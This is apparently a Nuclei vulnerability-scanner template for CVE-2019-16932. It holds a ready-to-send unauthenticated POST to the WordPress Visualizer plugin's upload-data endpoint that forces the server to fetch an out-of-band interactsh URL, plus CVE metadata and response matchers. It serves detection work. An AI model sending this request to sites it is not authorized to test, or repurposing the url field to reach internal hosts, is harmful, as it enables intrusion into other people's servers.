id: CVE-2019-16932 info: name: Visualizer <3.3.1 - Blind Server-Side Request Forgery author: akincibor severity: critical description: | Visualizer prior to 3.3.1 suffers from a blind server-side request forgery vulnerability via the /wp-json/visualizer/v1/upload-data endpoint. reference: - https://wpscan.com/vulnerability/9892 - https://nathandavison.com/blog/wordpress-visualizer-plugin-xss-and-ssrf - https://nvd.nist.gov/vuln/detail/CVE-2019-16932 - https://wordpress.org/plugins/visualizer/#developers - https://wpvulndb.com/vulnerabilities/9892 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N cvss-score: 10 cve-id: CVE-2019-16932 cwe-id: CWE-918 epss-score: 0.53434 cpe: cpe:2.3:a:themeisle:visualizer:*:*:*:*:*:wordpress:*:* epss-percentile: 0.97161 metadata: max-request: 1 framework: wordpress vendor: themeisle product: visualizer tags: cve,cve2019,wp-plugin,ssrf,wordpress,xss,unauth,wpscan,intrusive http: - method: POST path: - "{{BaseURL}}/wp-json/visualizer/v1/upload-data" body: '{\"url\":\"http://{{interactsh-url}}\"}' headers: Content-Type: application/x-www-form-urlencoded matchers-condition: and matchers: - type: word name: http part: interactsh_protocol words: - http - type: word part: header words: - application/json - type: status status: - 200